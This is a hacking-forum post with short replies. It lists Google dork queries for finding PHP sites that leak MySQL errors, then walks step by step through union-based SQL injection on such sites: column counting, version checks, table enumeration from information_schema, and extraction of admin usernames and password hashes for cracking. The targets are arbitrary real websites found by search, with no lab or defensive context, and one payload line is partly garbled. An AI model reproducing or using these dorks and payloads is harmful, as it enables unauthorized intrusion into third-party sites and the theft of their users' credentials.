Advanced SQL Injection

[h3lpless_alpaca]

FIRST STEP:

First thing you will want to do is find a proper search term. I have compiled a list:
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=


inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=[/


After searching google for one of the terms listed, open the websites in a tab.

STEP TWO:

Go through each website and simple put an apostraphe- ' at the end of the link, so it looks something like:

index.php?id=23'

If a MySQL error shows up on the page somewhere, it means its vulnerable.

STEP THREE:

Now that you have a MySQL error, you know it's vulnerable. We will need to see how many columns are on the actual webpage. This can be done
simply by type this at the end of the url (make sure you remove the apostraphe): order by 100-- . So the link would look like:

index.php?id=23 order by 100--

If there is still a MySQL error on the page, reduce the order by command by 1 (order by 1--). If there is no error, it means the website is vulnerable.
Increase the order by command by 1 until the page displays a MySQL error.

index.php?id=23 order by 1--
index.php?id=23 order by 2--
index.php?id=23 order by 3--
index.php?id=23 order by 4--

If the website happens to output a MySQL error at order by 4, that means there are 3 columns.

STEP FOUR

Now that you know the website has 3 columns, you will need to use a new command:

index.php?id=23 union all select 1,2,3--

Now you will need to search over the webpage for any visible numbers that you listed (1,2 or 3). Once you find a visible number,
replace the number in the URL with version(). This displays the MySQL version.

index.php?id=23 union all select 1,2,version()--

The visible number on the page will be replaced by the version of the MySQL version. If it's version 4.x.x, it's not worth going any further. If it's version 5.x.x, we can proceed.

STEP FIVE

Now after finding the version is 5+, we can extract the table names with this long command:

index.php?id=23 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--

All we are doing is replacing the number 3 (the visible number on the page) with the group concat command, and then it's extracting all the tables from the database.
After you see all the tables listed, you will want to find a table that looks like it has some good stuff in it, like admins, users, etc.

STEP SIX

Now let's say we found a table called admin. We will need to use another command to extract the variables within the table.
index.php?id=23 union all select 1,2,column_name from information_schem*****lumns where table_name='admin'--
Now we can hope it lists something like username, password. We can extract that type of information with one last simple command:

index.php?id=23 union all select 1,2,concat(username,0x3a,password) from admin--

This will now list the username and password of the admin table. The password could be indeed a MD5 hash. There are many md5 decrypters on the internet.

BTW sorry i reposted this i had to because the title i used before made it so i couldnt make a link for it in my sig >_<

[Anessydep]

Very informative post. Thanks for taking the time to share your view with us.

[House]

Epic BUMP lol

[Echo Phyber]

Seems like it's lacking the 'advanced' part.